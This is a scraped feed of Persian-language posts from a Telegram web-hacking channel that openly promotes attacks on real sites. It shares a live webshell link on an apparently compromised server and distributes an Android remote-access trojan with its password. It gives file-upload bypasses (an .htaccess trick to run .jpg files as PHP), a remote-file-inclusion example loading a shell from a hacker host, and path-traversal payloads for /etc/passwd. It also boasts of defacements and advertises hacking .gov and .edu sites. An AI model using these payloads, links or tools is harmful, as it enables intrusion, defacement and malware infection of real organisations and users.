شل برای تمرین فقط استفاده کنید حذفش نکنید بزارید بقیه هم استفاده کنن ❤️

https://bittergravity.com/test/fox63.php


#hack #Website #access #webshell
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

@Bvrce

Читать полностью…

برای fuzz از چه ابزار هایی استفاده کنیم ؟

Dirb
gobuster
dirsearch
ffuf
Wfuzz

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

باگ rfu باگی است که به ما اجازه میدهد فایل های غیرمجاز .html .php .txt را در سایت target آپلود کنیم و rfu مخفف شده remote file upload است

درواقع اگه اپلودری حتی فقططط فایل txt هماپلود بکنه باگ rfu داره

با استفاده از addons ها و یا اینسپکت المنت خودمون میتوانیم content type وب شل خود را به image/jpeg تغییر بدیم و بعد روی گزینه replay بزنیم و اگر آپلودر تارگت bug داشته باشه فایل .php ما اپلود میشه


کد آسیب پذیر در این نوع آپلود ها :

if ($_FILES['upload'['type']=='image/jpeg'){}


اگر اپلودر روی size فایل فیلترینگ انجام دهد باز میتوانیم با addonse و اینسپکت المنت آن آپلودر را بایپس و شل خود را آپلود کنیم

گاهی ممکن است در یک آپلودر این پسوند های . Php و... فیلتر شده باشند در این جور مواقع ممکن است نفوذگر با تغییر پسوند شل خود به jpg شل خود را آپلود کند سپس یک .htaccess آپلود کند که تمامی فایل های jpg را با کامپایلر php اجرا کند در این مواقع شل با پسوند jpg اجرا میشود


با استفاده از کد زیر که در .htaccess وارد میکنیم وب سرور تمامی فایل های با پسوند jpg را با کامپایلر php اجرا میکند در واقع ما با این روش میتوانیم شل اسکریپت خودمون رو با پسوند jpg روی سرور اجرا کنیم پس کافیه این نوع .htaccess رو روی سرور تارگت آپلود کنیم تا آن آپلودر را بایپس کنیم :

RemoveHandler .jpg
AddType application/octet-stream .php

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

craxs rat v4.9.5
Password => @imexemi
Licence : Attackndroid

به هیچ‌وجه روی سیستم اصلی و گوشی خودتون امتحان نکنید

Join => @imexemi

Читать полностью…

درمورد باگ lfi و rfi و نحوه به وجود امدن این باگ ها و نحوه پچ کردنشون


Lfi مخفف شده  :
Local file inclusion

باگ rfi مخفف شده :
Remote file inclusion

باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم :
Site.com/index.php?page=../../database.php

مثال خواندن فایل دیتابیس 👆👆

باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند

برای مثال :
target.com/index.php?page=hacker-site.com/shell.txt

همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد

هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include

برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم

روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است

جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini :

برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم

برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم


استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد :
include - include_once - requre - requre_ons


#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

🏃‍♂️ آموزش امنیت سایبری با حل چالش
✅ چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی
🔴 رایت آپ حل چالش ها
🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time

/channel/challenginno

Читать полностью…

درمورد بایپس توی حمله File path traversal :

من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله

اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید :
/image?filename=../../etc/passwd

خب اولین روش بایپس :
....//....//etc/passwd

دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم

سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم :
/image?filename=/var/www/image/../../etc/passwd

چهارمین متود یا همون روش :

/image?filename=../../etc/passwd%00.jpg

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

قیمت کانال وی ای پی ۷۱۰ تومان است دوستانی که از طرف ما برن برای ثبت نام ۶۰۰ تومن هستش


درواقع ۱۱۰ تومن تخفیف


رفتید برای ثبت نام بگید از طرف ما اومدین ۱۱۰ تومن تخفیف بگیرین ❤️


برای ثبت نام به این ایدی پیام بدین : @Bvrce

Читать полностью…

👑 VIP Channel  👑

😵🤔🙁😝😤☹️🙁☹️

ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد

فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره

دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت نام میکنین الان ثبت نام میکنیم

کانال vip وب هکینگ ما متفاوت با همه کانال ها هستش ترکیبی از کانال های vip خارجی و ایرانی چجوری ؟

اینطوری که هم توی کانال ابزار هم شل فایندر کرکر اکسپلویت و در کنار اینها اموزش های مربوط به وب هکینگ قرار داده میشه درواقع شما هم آموزش میبینید هم ابزار دارید

چیا توی کانال وب هکینگ هستش ؟

انواع کرکر
ابزار های مربوط به وب هکینگ
شل فایندر
اکسپلویت

و آموزش های مربوط به وب هکینگ که اینا نمونه اموزش های توی کانال vip وب هکینگ هستش 👇👇👇
t.me/KurtLar0101/489
t.me/KurtLar0101/311
t.me/KurtLar0101/313
t.me/KurtLar0101/315
t.me/KurtLar0101/316
t.me/KurtLar0101/317
t.me/KurtLar0101/330

نمونه ابزار هایی که توی کانال vip قرار داده شده :

t.me/KurtLar0101/377
t.me/KurtLar0101/393

قیمت ۷۱۰ تومان

برای تهیه vip پیام بدین :@Bvrce

Читать полностью…

Xpath Injection Admin Bypass

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

Xpath Injection -- Admin Bypass -- Shell Upload

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

داداش بیا پیوی
@soltane_sorat

Читать полностью…

هک سایت وردپرسی با باگ Arbitrary File Upload

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

مربوط به پست بالا 👆👆👆

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

CSRF - RFU

Pakistan admincp CMS Exploited

Servers : Win - 2012 - 2016 - 2019

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

این اکستنشن هایی برای وب هکینگ داشته باشیم ؟

Wappalyzer
Foxy proxy
Cookie editor
Shodan

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

📢 ا حتمال قطع موقت سرویس‌های اینترنتی 📌
🔞 با توجه به شرایط موجود و اعلام وضعیت قرمز سازمان پدافند غیرعامل، امکان قطع موقتی سرویس‌ها و ایران اکسس شدن برخی از دیتاسنترها و... وجود داره.

#سراسری ⚡️
@soltane_sorat
@learnexploit

Читать полностью…

باگ xss و csrf مثل هم هستند در باگ csrf هکر خود را به عنوان کاربر مجاز جعل میکند و سایت این را تشخیص نمیدهد و csrf ایجاد میشود

در باگ xss از اعتماد کاربر به سایت سو استفاده میشود و در باگ csrf از اعتماد سایت به کاربر سو استفاده میشود

باگ csrf مخفف شده :
Cross site request forgery
است

بیشتر اکسپلویت های csrf با زبان html نوشته میشوند و باگ csrf چیزی را نمی سازد بلکه از امکانات سایت با جعل خود به یوزر مجاز استفاده میکند مثل add admin در بسیاری از پنل های مدیریت محتوا که باگ csrf دارند و امکان add admin را هم در پنل خود دارند

باگ csrf سمت کلاینت هست
باگ csrf سخت ترین باگ در path کردن آن است

پچ کردن باگ csrf در متود post سخت تر از پچ کردن باگ csrf در متود get است

بهترین روش برای جلوگیری از باگ csrf تعریف سشن و توکن است

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

Sending client data to the robot with the help of PowerShell
GITHUB

#Tools——————‌—
IR0Day.Today Bax
@LearnExploit

Читать полностью…

باگ HTTP Smuggling چیه؟
ورژن HTTP/1.0:
در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز می‌شد و پس از دریافت پاسخ، این اتصال بسته می‌شد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر می‌شد، به خصوص وقتی درخواست‌های متعددی باید پشت سر هم به یک سرور ارسال می‌شد.

ورژن HTTP/1.1:
در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینه‌سازی اتصال‌ها و کاهش بار شبکه شد:

ویژگی Keep-Alive: این ویژگی اجازه می‌دهد که یک اتصال TCP پس از دریافت پاسخ بسته نشود و برای درخواست‌های بعدی باز بماند. این قابلیت با هدر Connection: keep-alive پیاده‌سازی می‌شود. وقتی از Keep-Alive استفاده می‌شود، کلاینت می‌تواند چندین درخواست HTTP را بدون نیاز به باز و بسته کردن مداوم اتصالات TCP ارسال کند.
برای تست این قابلیت می‌توان از دستور زیر استفاده کرد:
curl --keepalive-time 10 http://theemi.ir/1 http://theemi.ir/2
این دستور به سرور می‌گوید که اتصال TCP را تا 10 ثانیه باز نگه دارد و سپس بسته شود.

ویژگی Pipelining: در این حالت، کلاینت می‌تواند چند درخواست HTTP را به صورت همزمان و پشت سر هم به یک اتصال ارسال کند، بدون اینکه منتظر دریافت پاسخ هر درخواست بماند. پاسخ‌ها نیز به ترتیب ارسال درخواست‌ها از سرور دریافت می‌شوند.
برای تست این قابلیت:
echo -en "GET /path1 HTTP/1.1\r\nHost: theemi.ir\r\n\r\nGET /path2 HTTP/1.1\r\nHost: theemi.ir\r\n\r\n" | nc theemi.ir 80
در اینجا از nc (Netcat) برای باز کردن یک اتصال TCP روی پورت 80 استفاده می‌شود و دو درخواست HTTP به صورت پیپ‌لاین شده ارسال می‌گردند.


انواع Transfer-Encoding:
این هدر برای کنترل نحوه انتقال داده‌ها در پروتکل HTTP استفاده می‌شود و شامل انواع مختلفی است:

chunked
compress
deflate
gzip
identity

مهم‌ترین و پرکاربردترین آن‌ها در این زمینه Chunked است. در انتقال chunked، داده‌ها به قطعات (چانک‌ها) تقسیم شده و به سرور ارسال می‌شوند. هر چانک یک سایز مشخص دارد و با پایان هر چانک، سایز بعدی ارسال می‌شود. این روش معمولاً در ارسال داده‌های آپلودی بزرگ استفاده می‌شود، به طوری که سرور بتواند بدون نیاز به دانستن اندازه کامل محتوا، داده‌ها را دریافت کند.

حمله HTTP Request Smuggling:
این تکنیک حمله زمانی رخ می‌دهد که یک کلاینت (حمله‌کننده) از تفاوت نحوه پردازش درخواست‌ها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بک‌اند ارسال کند.
برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:

فرانت‌اند(Front-end server): سروری که مستقیماً به کلاینت سرویس می‌دهد.
بک‌اند(Back-end server): سروری که درخواست‌های پردازش‌شده را از فرانت‌اند دریافت می‌کند و پاسخ نهایی را به فرانت‌اند می‌دهد

.

ویژگی Keep-Alive و Pipelining بین کلاینت و فرانت‌اند سرور برقرار است، اما بین فرانت‌اند و بک‌اند چنین نیست.
فرانت‌اند درخواست‌ها را به بک‌اند ارسال می‌کند، اما بک‌اند نمی‌تواند درخواست‌ها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواست‌ها بین این دو سرور وجود دارد.

مراحل حمله:
مهاجم دو درخواست به صورت پشت سر هم به فرانت‌اند ارسال می‌کند. فرانت‌اند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بک‌اند ارسال کند.
بک‌اند که به درستی پارس می‌کند، این دو درخواست را جدا از هم می‌بیند و پاسخ اولین درخواست را به فرانت‌اند ارسال می‌کند.
فرانت‌اند این پاسخ را به کلاینت برمی‌گرداند، اما درخواست دوم که در بافر بک‌اند مانده، روی درخواست بعدی قرار می‌گیرد.
این باعث می‌شود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند.
این تفاوت در نحوه پردازش و پارس کردن درخواست‌ها بین سرورهای فرانت‌اند و بک‌اند، منجر به این حمله می‌شود و می‌تواند امنیت سرور و داده‌های کاربران دیگر را به خطر بیندازد.
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
✍ imem!

Читать полностью…

باگ xss چه باگیه :

باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم

باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه

کجاها ؟
قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و...

باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم


خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت

ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن

و حمله csrf از زیرمجموعه های باگ xss هستش

و چندین نوع xss داریم :

Xss از نوع Reflected

معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه


Xss از نوع stored

خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد

حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه

و نوع دیگه ای از xss  نوع Dom هستش





خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟

میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php  محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم



#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

Linuxconsole😂😂😂😂😂

Mirror : https://zone-h.org/mirror/id/41210067


چن ماه پیش یکی از سایتای گنده جهانو زدیم لینوکس کنسول اره سیستم عامل لینوکس کنسولو دیفیس کردیم

خواستم بگم تو بحث وب هکینگ توی کانال vip توسط یه مدرسی تدریس میشه که چهارتا سایت درست حسابی زده حرفی برای گفتن داره


و خب قراره پاییزو بشینین دیفیس کنین اکسس بگیرین دیتابیس بزنین طعم واقعی وب هکینگ‌ بچشین

اینکه سایتای وردپرسی چجوری هک میشن cms ها چجوری اکسپلویت میشن و.... قراره فله ای روی تارگتای واقعی مانور بدیم

زون اچ ما : https://zone-h.org/archive/notifier=D4LGH4CK_TM


برای ثبت نام تو کانال vip وب هکینگ به ایدی زیر پیام بدین 👇

@Bvrce

Читать полностью…

و خب در ویدیو های آموزش سایت های واقعی رو مورد اتک و بررسی قرار میدیم درواقع تارگت داریم برای هر باگی و در دنیای واقعی شما میاید تارگت میزنید و ازمایشگاهی به این شکل نخواهیم داشت اگرم ازمایشگاه هم داشته باشیم برای دو سه تا باگ هست که اگه تارگت واقعی برای اونا پیدا نشه توی ازمایشگاه تست بکنیم

و اینکه سایت های وردپرسی رو مورد بررسی قرار میدیم اصلا توی اموزش یاد میدیم چجوری روی یا سایت وردپرسی شل اپلود کنیم هکش کنیم بیشتر تارگت های ما وردپرسیییی هستتد

بنده چندین سال در حوضه وب هکینگ فعالیت داشتم شما میتونید از طریق زون اچ کارای بنده رو مورد بررسی قرار بدین :

https://zone-h.org/archive/notifier=D4LGH4CK_TM

Читать полностью…

👆👆👆

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

👆👆👆

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

برنامه های اتصال به RDP در ویندوز و اندروید :

Windows:
— Remote Desktop Connection 2003
این برنامه برای اتصال NoNLA به RDP استفاده میشه..

—RDP Multi Tool

این برنامه برای مدیریت تعداد زیادی از RDP ها استفاده میشه..‏


android:
—RD Client :
https://play.google.com/store/apps/details?id=com.microsoft.rdc.androidx

آموزش کرک RDP :
@MajesticHackers

—————
@LearnExploit

Читать полностью…

مربوط به پست بالا 👆👆👆

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

in this video we tech how to Hack a Website with Weak PAssword and upload webshell in admin panel

نحوه هک و آپلود شل از طریق پنل ادمین با پسورد ضعیف اسم این متود رو بزارین ویک پسورد

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

Local File Download LFD
Target : edu.af

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…

How to hack gov.gh website

Berekum East Municipal Assembly

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101

Читать полностью…